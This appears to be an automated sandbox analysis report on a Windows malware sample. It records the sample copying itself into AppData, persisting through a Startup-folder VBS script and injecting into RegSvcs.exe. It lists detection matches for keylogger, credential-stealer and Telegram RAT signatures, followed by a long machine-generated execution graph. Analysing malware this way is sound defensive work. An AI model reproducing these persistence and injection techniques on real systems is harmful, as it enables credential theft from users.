                                                                                                  2025-01-08 14:44:34 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:09:43:58
                                                                                                  Start date:08/01/2025
                                                                                                  Path:C:\Users\user\Desktop\oagkiAhXgZ.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\oagkiAhXgZ.exe"
                                                                                                  Imagebase:0xaa0000
                                                                                                  File size:1'111'040 bytes
                                                                                                  MD5 hash:EB8C8ACAE9D3A669129902384F5335B2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:09:44:01
                                                                                                  Start date:08/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Thebesian\reindulgence.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\oagkiAhXgZ.exe"
                                                                                                  Imagebase:0xf60000
                                                                                                  File size:1'111'040 bytes
                                                                                                  MD5 hash:EB8C8ACAE9D3A669129902384F5335B2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 63%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:09:44:03
                                                                                                  Start date:08/01/2025
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\oagkiAhXgZ.exe"
                                                                                                  Imagebase:0x5f0000
                                                                                                  File size:45'984 bytes
                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4503499824.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:5
                                                                                                  Start time:09:44:15
                                                                                                  Start date:08/01/2025
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs"
                                                                                                  Imagebase:0x7ff7e5ea0000
                                                                                                  File size:170'496 bytes
                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:09:44:16
                                                                                                  Start date:08/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Thebesian\reindulgence.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"
                                                                                                  Imagebase:0xf60000
                                                                                                  File size:1'111'040 bytes
                                                                                                  MD5 hash:EB8C8ACAE9D3A669129902384F5335B2
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:09:44:20
                                                                                                  Start date:08/01/2025
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"
                                                                                                  Imagebase:0xa30000
                                                                                                  File size:45'984 bytes
                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4503982433.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                    Signature Coverage:2.8%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:57
                                                                                                    execution_graph 96471 aa1cad SystemParametersInfoW 96472 aa2de3 96473 aa2df0 __wsopen_s 96472->96473 96474 aa2e09 96473->96474 96475 ae2c2b ___scrt_fastfail 96473->96475 96488 aa3aa2 96474->96488 96477 ae2c47 GetOpenFileNameW 96475->96477 96479 ae2c96 96477->96479 96546 aa6b57 96479->96546 96483 ae2cab 96483->96483 96485 aa2e27 96516 aa44a8 96485->96516 96558 ae1f50 96488->96558 96491 aa3ae9 96564 aaa6c3 96491->96564 96492 aa3ace 96493 aa6b57 22 API calls 96492->96493 96495 aa3ada 96493->96495 96560 aa37a0 96495->96560 96498 aa2da5 96499 ae1f50 __wsopen_s 96498->96499 96500 aa2db2 GetLongPathNameW 96499->96500 96501 aa6b57 22 API calls 96500->96501 96502 aa2dda 96501->96502 96503 aa3598 96502->96503 96615 aaa961 96503->96615 96506 aa3aa2 23 API calls 96507 aa35b5 96506->96507 96508 aa35c0 96507->96508 96512 ae32eb 96507->96512 96620 aa515f 96508->96620 96513 ae330d 96512->96513 96632 abce60 41 API calls 96512->96632 96515 aa35df 96515->96485 96633 aa4ecb 96516->96633 96519 ae3833 96655 b12cf9 96519->96655 96521 aa4ecb 94 API calls 96523 aa44e1 96521->96523 96522 ae3848 96524 ae384c 96522->96524 96525 ae3869 96522->96525 96523->96519 96526 aa44e9 96523->96526 96696 aa4f39 96524->96696 96528 abfe0b 22 API calls 96525->96528 96529 ae3854 96526->96529 96530 aa44f5 96526->96530 96545 ae38ae 96528->96545 96702 b0da5a 82 API calls 96529->96702 96695 aa940c 136 API calls 2 library calls 96530->96695 96533 ae3862 96533->96525 96534 aa2e31 96535 ae3a5f 96540 ae3a67 96535->96540 96536 aa4f39 68 API calls 96536->96540 96540->96536 96706 b0989b 82 API calls __wsopen_s 96540->96706 96542 aa9cb3 22 API calls 96542->96545 96545->96535 96545->96540 96545->96542 96681 aaa4a1 96545->96681 96689 aa3ff7 96545->96689 96703 b0967e 22 API calls __fread_nolock 96545->96703 96704 b095ad 42 API calls _wcslen 96545->96704 96705 b10b5a 22 API calls 96545->96705 96547 aa6b67 _wcslen 96546->96547 96548 ae4ba1 96546->96548 96551 aa6b7d 96547->96551 96552 aa6ba2 96547->96552 96549 aa93b2 22 API calls 96548->96549 96550 ae4baa 96549->96550 96550->96550 97346 aa6f34 22 API calls 96551->97346 96554 abfddb 22 API calls 96552->96554 96556 aa6bae 96554->96556 96555 aa6b85 __fread_nolock 96555->96483 96557 abfe0b 22 API calls 96556->96557 96557->96555 96559 aa3aaf GetFullPathNameW 96558->96559 96559->96491 96559->96492 96561 aa37ae 96560->96561 96570 aa93b2 96561->96570 96563 aa2e12 96563->96498 96565 aaa6dd 96564->96565 96569 aaa6d0 96564->96569 96566 abfddb 22 API calls 96565->96566 96567 aaa6e7 96566->96567 96568 abfe0b 22 API calls 96567->96568 96568->96569 96569->96495 96571 aa93c0 96570->96571 96572 aa93c9 __fread_nolock 96570->96572 96571->96572 96574 aaaec9 96571->96574 96572->96563 96572->96572 96575 aaaed9 __fread_nolock 96574->96575 96576 aaaedc 96574->96576 96575->96572 96580 abfddb 96576->96580 96578 aaaee7 96590 abfe0b 96578->96590 96583 abfde0 96580->96583 96582 abfdfa 96582->96578 96583->96582 96585 abfdfc 96583->96585 96600 acea0c 96583->96600 96607 ac4ead 7 API calls 2 library calls 96583->96607 96586 ac066d 96585->96586 96608 ac32a4 RaiseException 96585->96608 96609 ac32a4 RaiseException 96586->96609 96588 ac068a 96588->96578 96593 abfddb 96590->96593 96591 acea0c ___std_exception_copy 21 API calls 96591->96593 96592 abfdfa 96592->96575 96593->96591 96593->96592 96596 abfdfc 96593->96596 96612 ac4ead 7 API calls 2 library calls 96593->96612 96595 ac066d 96614 ac32a4 RaiseException 96595->96614 96596->96595 96613 ac32a4 RaiseException 96596->96613 96598 ac068a 96598->96575 96602 ad3820 _abort 96600->96602 96601 ad385e 96611 acf2d9 20 API calls __dosmaperr 96601->96611 96602->96601 96603 ad3849 RtlAllocateHeap 96602->96603 96610 ac4ead 7 API calls 2 library calls 96602->96610 96603->96602 96605 ad385c 96603->96605 96605->96583 96607->96583 96608->96586 96609->96588 96610->96602 96611->96605 96612->96593 96613->96595 96614->96598 96616 abfe0b 22 API calls 96615->96616 96617 aaa976 96616->96617 96618 abfddb 22 API calls 96617->96618 96619 aa35aa 96618->96619 96619->96506 96621 aa516e 96620->96621 96625 aa518f __fread_nolock 96620->96625 96623 abfe0b 22 API calls 96621->96623 96622 abfddb 22 API calls 96624 aa35cc 96622->96624 96623->96625 96626 aa35f3 96624->96626 96625->96622 96627 aa3605 96626->96627 96631 aa3624 __fread_nolock 96626->96631 96629 abfe0b 22 API calls 96627->96629 96628 abfddb 22 API calls 96630 aa363b 96628->96630 96629->96631 96630->96515 96631->96628 96632->96512 96707 aa4e90 LoadLibraryA 96633->96707 96638 ae3ccf 96641 aa4f39 68 API calls 96638->96641 96639 aa4ef6 LoadLibraryExW 96715 aa4e59 LoadLibraryA 96639->96715 96643 ae3cd6 96641->96643 96644 aa4e59 3 API calls 96643->96644 96646 ae3cde 96644->96646 96737 aa50f5 96646->96737 96647 aa4f20 96647->96646 96648 aa4f2c 96647->96648 96650 aa4f39 68 API calls 96648->96650 96652 aa44cd 96650->96652 96652->96519 96652->96521 96654 ae3d05 96656 b12d15 96655->96656 96657 aa511f 64 API calls 96656->96657 96658 b12d29 96657->96658 97016 b12e66 96658->97016 96661 aa50f5 40 API calls 96662 b12d56 96661->96662 96663 aa50f5 40 API calls 96662->96663 96664 b12d66 96663->96664 96665 aa50f5 40 API calls 96664->96665 96666 b12d81 96665->96666 96667 aa50f5 40 API calls 96666->96667 96668 b12d9c 96667->96668 96669 aa511f 64 API calls 96668->96669 96670 b12db3 96669->96670 96671 acea0c ___std_exception_copy 21 API calls 96670->96671 96672 b12dba 96671->96672 96673 acea0c ___std_exception_copy 21 API calls 96672->96673 96674 b12dc4 96673->96674 96675 aa50f5 40 API calls 96674->96675 96676 b12dd8 96675->96676 96677 b128fe 27 API calls 96676->96677 96679 b12dee 96677->96679 96678 b12d3f 96678->96522 96679->96678 97022 b122ce 96679->97022 96682 aaa52b 96681->96682 96688 aaa4b1 __fread_nolock 96681->96688 96684 abfe0b 22 API calls 96682->96684 96683 abfddb 22 API calls 96685 aaa4b8 96683->96685 96684->96688 96686 abfddb 22 API calls 96685->96686 96687 aaa4d6 96685->96687 96686->96687 96687->96545 96688->96683 96690 aa400a 96689->96690 96692 aa40ae 96689->96692 96691 abfe0b 22 API calls 96690->96691 96694 aa403c 96690->96694 96691->96694 96692->96545 96693 abfddb 22 API calls 96693->96694 96694->96692 96694->96693 96695->96534 96697 aa4f4a 96696->96697 96698 aa4f43 96696->96698 96700 aa4f6a FreeLibrary 96697->96700 96701 aa4f59 96697->96701 96699 ace678 67 API calls 96698->96699 96699->96697 96700->96701 96701->96529 96702->96533 96703->96545 96704->96545 96705->96545 96706->96540 96708 aa4ea8 GetProcAddress 96707->96708 96709 aa4ec6 96707->96709 96710 aa4eb8 96708->96710 96712 ace5eb 96709->96712 96710->96709 96711 aa4ebf FreeLibrary 96710->96711 96711->96709 96745 ace52a 96712->96745 96714 aa4eea 96714->96638 96714->96639 96716 aa4e6e GetProcAddress 96715->96716 96717 aa4e8d 96715->96717 96718 aa4e7e 96716->96718 96720 aa4f80 96717->96720 96718->96717 96719 aa4e86 FreeLibrary 96718->96719 96719->96717 96721 abfe0b 22 API calls 96720->96721 96722 aa4f95 96721->96722 96813 aa5722 96722->96813 96724 aa4fa1 __fread_nolock 96725 ae3d1d 96724->96725 96726 aa50a5 96724->96726 96736 aa4fdc 96724->96736 96827 b1304d 74 API calls 96725->96827 96816 aa42a2 CreateStreamOnHGlobal 96726->96816 96729 ae3d22 96731 aa511f 64 API calls 96729->96731 96730 aa50f5 40 API calls 96730->96736 96732 ae3d45 96731->96732 96733 aa50f5 40 API calls 96732->96733 96735 aa506e ISource 96733->96735 96735->96647 96736->96729 96736->96730 96736->96735 96822 aa511f 96736->96822 96738 aa5107 96737->96738 96739 ae3d70 96737->96739 96849 ace8c4 96738->96849 96742 b128fe 96999 b1274e 96742->96999 96744 b12919 96744->96654 96746 ace536 BuildCatchObjectHelperInternal 96745->96746 96747 ace544 96746->96747 96749 ace574 96746->96749 96770 acf2d9 20 API calls __dosmaperr 96747->96770 96751 ace579 96749->96751 96752 ace586 96749->96752 96750 ace549 96771 ad27ec 26 API calls ___std_exception_copy 96750->96771 96772 acf2d9 20 API calls __dosmaperr 96751->96772 96762 ad8061 96752->96762 96756 ace58f 96757 ace595 96756->96757 96758 ace5a2 96756->96758 96773 acf2d9 20 API calls __dosmaperr 96757->96773 96774 ace5d4 LeaveCriticalSection __fread_nolock 96758->96774 96759 ace554 __fread_nolock 96759->96714 96763 ad806d BuildCatchObjectHelperInternal 96762->96763 96775 ad2f5e EnterCriticalSection 96763->96775 96765 ad807b 96776 ad80fb 96765->96776 96769 ad80ac __fread_nolock 96769->96756 96770->96750 96771->96759 96772->96759 96773->96759 96774->96759 96775->96765 96783 ad811e 96776->96783 96777 ad8177 96794 ad4c7d 96777->96794 96782 ad8189 96788 ad8088 96782->96788 96807 ad3405 11 API calls 2 library calls 96782->96807 96783->96777 96783->96783 96783->96788 96792 ac918d EnterCriticalSection 96783->96792 96793 ac91a1 LeaveCriticalSection 96783->96793 96785 ad81a8 96808 ac918d EnterCriticalSection 96785->96808 96789 ad80b7 96788->96789 96812 ad2fa6 LeaveCriticalSection 96789->96812 96791 ad80be 96791->96769 96792->96783 96793->96783 96800 ad4c8a _abort 96794->96800 96795 ad4cca 96810 acf2d9 20 API calls __dosmaperr 96795->96810 96796 ad4cb5 RtlAllocateHeap 96797 ad4cc8 96796->96797 96796->96800 96801 ad29c8 96797->96801 96800->96795 96800->96796 96809 ac4ead 7 API calls 2 library calls 96800->96809 96802 ad29d3 RtlFreeHeap 96801->96802 96806 ad29fc __dosmaperr 96801->96806 96803 ad29e8 96802->96803 96802->96806 96811 acf2d9 20 API calls __dosmaperr 96803->96811 96805 ad29ee GetLastError 96805->96806 96806->96782 96807->96785 96808->96788 96809->96800 96810->96797 96811->96805 96812->96791 96814 abfddb 22 API calls 96813->96814 96815 aa5734 96814->96815 96815->96724 96817 aa42bc FindResourceExW 96816->96817 96821 aa42d9 96816->96821 96818 ae35ba LoadResource 96817->96818 96817->96821 96819 ae35cf SizeofResource 96818->96819 96818->96821 96820 ae35e3 LockResource 96819->96820 96819->96821 96820->96821 96821->96736 96823 aa512e 96822->96823 96824 ae3d90 96822->96824 96828 acece3 96823->96828 96827->96729 96831 aceaaa 96828->96831 96830 aa513c 96830->96736 96834 aceab6 BuildCatchObjectHelperInternal 96831->96834 96832 aceac2 96844 acf2d9 20 API calls __dosmaperr 96832->96844 96834->96832 96835 aceae8 96834->96835 96846 ac918d EnterCriticalSection 96835->96846 96837 aceac7 96845 ad27ec 26 API calls ___std_exception_copy 96837->96845 96838 aceaf4 96847 acec0a 62 API calls 2 library calls 96838->96847 96841 aceb08 96848 aceb27 LeaveCriticalSection __fread_nolock 96841->96848 96842 acead2 __fread_nolock 96842->96830 96844->96837 96845->96842 96846->96838 96847->96841 96848->96842 96852 ace8e1 96849->96852 96851 aa5118 96851->96742 96853 ace8ed BuildCatchObjectHelperInternal 96852->96853 96854 ace92d 96853->96854 96855 ace900 ___scrt_fastfail 96853->96855 96856 ace925 __fread_nolock 96853->96856 96865 ac918d EnterCriticalSection 96854->96865 96879 acf2d9 20 API calls __dosmaperr 96855->96879 96856->96851 96858 ace937 96866 ace6f8 96858->96866 96860 ace91a 96880 ad27ec 26 API calls ___std_exception_copy 96860->96880 96865->96858 96867 ace70a ___scrt_fastfail 96866->96867 96872 ace727 96866->96872 96868 ace717 96867->96868 96867->96872 96877 ace76a __fread_nolock 96867->96877 96954 acf2d9 20 API calls __dosmaperr 96868->96954 96870 ace71c 96955 ad27ec 26 API calls ___std_exception_copy 96870->96955 96881 ace96c LeaveCriticalSection __fread_nolock 96872->96881 96873 ace886 ___scrt_fastfail 96957 acf2d9 20 API calls __dosmaperr 96873->96957 96877->96872 96877->96873 96882 acd955 96877->96882 96889 ad8d45 96877->96889 96956 accf78 26 API calls 4 library calls 96877->96956 96879->96860 96880->96856 96881->96856 96883 acd976 96882->96883 96884 acd961 96882->96884 96883->96877 96958 acf2d9 20 API calls __dosmaperr 96884->96958 96886 acd966 96959 ad27ec 26 API calls ___std_exception_copy 96886->96959 96888 acd971 96888->96877 96890 ad8d6f 96889->96890 96891 ad8d57 96889->96891 96892 ad90d9 96890->96892 96896 ad8db4 96890->96896 96969 acf2c6 20 API calls __dosmaperr 96891->96969 96991 acf2c6 20 API calls __dosmaperr 96892->96991 96894 ad8d5c 96970 acf2d9 20 API calls __dosmaperr 96894->96970 96899 ad8dbf 96896->96899 96903 ad8d64 96896->96903 96907 ad8def 96896->96907 96898 ad90de 96992 acf2d9 20 API calls __dosmaperr 96898->96992 96971 acf2c6 20 API calls __dosmaperr 96899->96971 96901 ad8dcc 96993 ad27ec 26 API calls ___std_exception_copy 96901->96993 96903->96877 96904 ad8dc4 96972 acf2d9 20 API calls __dosmaperr 96904->96972 96908 ad8e08 96907->96908 96909 ad8e2e 96907->96909 96910 ad8e4a 96907->96910 96908->96909 96916 ad8e15 96908->96916 96973 acf2c6 20 API calls __dosmaperr 96909->96973 96976 ad3820 96910->96976 96912 ad8e33 96974 acf2d9 20 API calls __dosmaperr 96912->96974 96960 adf89b 96916->96960 96918 ad8e3a 96975 ad27ec 26 API calls ___std_exception_copy 96918->96975 96919 ad8fb3 96922 ad9029 96919->96922 96925 ad8fcc GetConsoleMode 96919->96925 96920 ad29c8 _free 20 API calls 96923 ad8e6a 96920->96923 96924 ad902d ReadFile 96922->96924 96926 ad29c8 _free 20 API calls 96923->96926 96927 ad9047 96924->96927 96928 ad90a1 GetLastError 96924->96928 96925->96922 96929 ad8fdd 96925->96929 96930 ad8e71 96926->96930 96927->96928 96935 ad901e 96927->96935 96933 ad90ae 96928->96933 96934 ad9005 96928->96934 96929->96924 96936 ad8fe3 ReadConsoleW 96929->96936 96931 ad8e7b 96930->96931 96932 ad8e96 96930->96932 96983 acf2d9 20 API calls __dosmaperr 96931->96983 96985 ad9424 28 API calls __wsopen_s 96932->96985 96989 acf2d9 20 API calls __dosmaperr 96933->96989 96952 ad8e45 __fread_nolock 96934->96952 96986 acf2a3 20 API calls __dosmaperr 96934->96986 96947 ad906c 96935->96947 96948 ad9083 96935->96948 96935->96952 96936->96935 96940 ad8fff GetLastError 96936->96940 96940->96934 96941 ad29c8 _free 20 API calls 96941->96903 96942 ad8e80 96984 acf2c6 20 API calls __dosmaperr 96942->96984 96943 ad90b3 96990 acf2c6 20 API calls __dosmaperr 96943->96990 96987 ad8a61 31 API calls 3 library calls 96947->96987 96950 ad909a 96948->96950 96948->96952 96988 ad88a1 29 API calls __wsopen_s 96950->96988 96952->96941 96953 ad909f 96953->96952 96954->96870 96955->96872 96956->96877 96957->96870 96958->96886 96959->96888 96961 adf8a8 96960->96961 96962 adf8b5 96960->96962 96994 acf2d9 20 API calls __dosmaperr 96961->96994 96965 adf8c1 96962->96965 96995 acf2d9 20 API calls __dosmaperr 96962->96995 96964 adf8ad 96964->96919 96965->96919 96967 adf8e2 96996 ad27ec 26 API calls ___std_exception_copy 96967->96996 96969->96894 96970->96903 96971->96904 96972->96901 96973->96912 96974->96918 96975->96952 96977 ad385e 96976->96977 96981 ad382e _abort 96976->96981 96998 acf2d9 20 API calls __dosmaperr 96977->96998 96978 ad3849 RtlAllocateHeap 96980 ad385c 96978->96980 96978->96981 96980->96920 96981->96977 96981->96978 96997 ac4ead 7 API calls 2 library calls 96981->96997 96983->96942 96984->96952 96985->96916 96986->96952 96987->96952 96988->96953 96989->96943 96990->96952 96991->96898 96992->96901 96993->96903 96994->96964 96995->96967 96996->96964 96997->96981 96998->96980 97002 ace4e8 96999->97002 97001 b1275d 97001->96744 97005 ace469 97002->97005 97004 ace505 97004->97001 97006 ace478 97005->97006 97007 ace48c 97005->97007 97013 acf2d9 20 API calls __dosmaperr 97006->97013 97012 ace488 __alldvrm 97007->97012 97015 ad333f 11 API calls 2 library calls 97007->97015 97009 ace47d 97014 ad27ec 26 API calls ___std_exception_copy 97009->97014 97012->97004 97013->97009 97014->97012 97015->97012 97019 b12e7a 97016->97019 97017 b128fe 27 API calls 97017->97019 97018 b12d3b 97018->96661 97018->96678 97019->97017 97019->97018 97020 aa50f5 40 API calls 97019->97020 97021 aa511f 64 API calls 97019->97021 97020->97019 97021->97019 97023 b122d9 97022->97023 97024 b122e7 97022->97024 97025 ace5eb 29 API calls 97023->97025 97026 b1232c 97024->97026 97027 ace5eb 29 API calls 97024->97027 97050 b122f0 97024->97050 97025->97024 97051 b12557 97026->97051 97029 b12311 97027->97029 97029->97026 97031 b1231a 97029->97031 97030 b12370 97032 b12395 97030->97032 97036 b12374 97030->97036 97033 ace678 67 API calls 97031->97033 97031->97050 97055 b12171 97032->97055 97033->97050 97035 b12381 97041 ace678 67 API calls 97035->97041 97035->97050 97036->97035 97038 ace678 67 API calls 97036->97038 97037 b1239d 97039 b123c3 97037->97039 97040 b123a3 97037->97040 97038->97035 97062 b123f3 97039->97062 97042 b123b0 97040->97042 97044 ace678 67 API calls 97040->97044 97041->97050 97045 ace678 67 API calls 97042->97045 97042->97050 97044->97042 97045->97050 97046 b123ca 97047 b123de 97046->97047 97070 ace678 97046->97070 97049 ace678 67 API calls 97047->97049 97047->97050 97049->97050 97050->96678 97052 b1257c 97051->97052 97054 b12565 __fread_nolock 97051->97054 97053 ace8c4 __fread_nolock 40 API calls 97052->97053 97053->97054 97054->97030 97056 acea0c ___std_exception_copy 21 API calls 97055->97056 97057 b1217f 97056->97057 97058 acea0c ___std_exception_copy 21 API calls 97057->97058 97059 b12190 97058->97059 97060 acea0c ___std_exception_copy 21 API calls 97059->97060 97061 b1219c 97060->97061 97061->97037 97069 b12408 97062->97069 97063 b124c0 97087 b12724 97063->97087 97064 b121cc 40 API calls 97064->97069 97066 b124c7 97066->97046 97069->97063 97069->97064 97069->97066 97083 b12606 97069->97083 97091 b12269 40 API calls 97069->97091 97071 ace684 BuildCatchObjectHelperInternal 97070->97071 97072 ace6aa 97071->97072 97073 ace695 97071->97073 97082 ace6a5 __fread_nolock 97072->97082 97127 ac918d EnterCriticalSection 97072->97127 97144 acf2d9 20 API calls __dosmaperr 97073->97144 97076 ace69a 97145 ad27ec 26 API calls ___std_exception_copy 97076->97145 97077 ace6c6 97128 ace602 97077->97128 97080 ace6d1 97146 ace6ee LeaveCriticalSection __fread_nolock 97080->97146 97082->97047 97084 b12617 97083->97084 97085 b1261d 97083->97085 97084->97085 97092 b126d7 97084->97092 97085->97069 97088 b12731 97087->97088 97089 b12742 97087->97089 97090 acdbb3 65 API calls 97088->97090 97089->97066 97090->97089 97091->97069 97093 b12703 97092->97093 97094 b12714 97092->97094 97096 acdbb3 97093->97096 97094->97084 97097 acdbc1 97096->97097 97103 acdbdd 97096->97103 97098 acdbcd 97097->97098 97099 acdbe3 97097->97099 97097->97103 97108 acf2d9 20 API calls __dosmaperr 97098->97108 97105 acd9cc 97099->97105 97102 acdbd2 97109 ad27ec 26 API calls ___std_exception_copy 97102->97109 97103->97094 97110 acd97b 97105->97110 97107 acd9f0 97107->97103 97108->97102 97109->97103 97111 acd987 BuildCatchObjectHelperInternal 97110->97111 97118 ac918d EnterCriticalSection 97111->97118 97113 acd995 97119 acd9f4 97113->97119 97117 acd9b3 __fread_nolock 97117->97107 97118->97113 97120 ad49a1 27 API calls 97119->97120 97121 acda09 97120->97121 97122 acda3a 62 API calls 97121->97122 97123 acda24 97122->97123 97124 ad4a56 62 API calls 97123->97124 97125 acd9a2 97124->97125 97126 acd9c0 LeaveCriticalSection __fread_nolock 97125->97126 97126->97117 97127->97077 97129 ace60f 97128->97129 97130 ace624 97128->97130 97172 acf2d9 20 API calls __dosmaperr 97129->97172 97136 ace61f 97130->97136 97147 acdc0b 97130->97147 97132 ace614 97173 ad27ec 26 API calls ___std_exception_copy 97132->97173 97136->97080 97139 acd955 __fread_nolock 26 API calls 97140 ace646 97139->97140 97157 ad862f 97140->97157 97143 ad29c8 _free 20 API calls 97143->97136 97144->97076 97145->97082 97146->97082 97148 acdc23 97147->97148 97152 acdc1f 97147->97152 97149 acd955 __fread_nolock 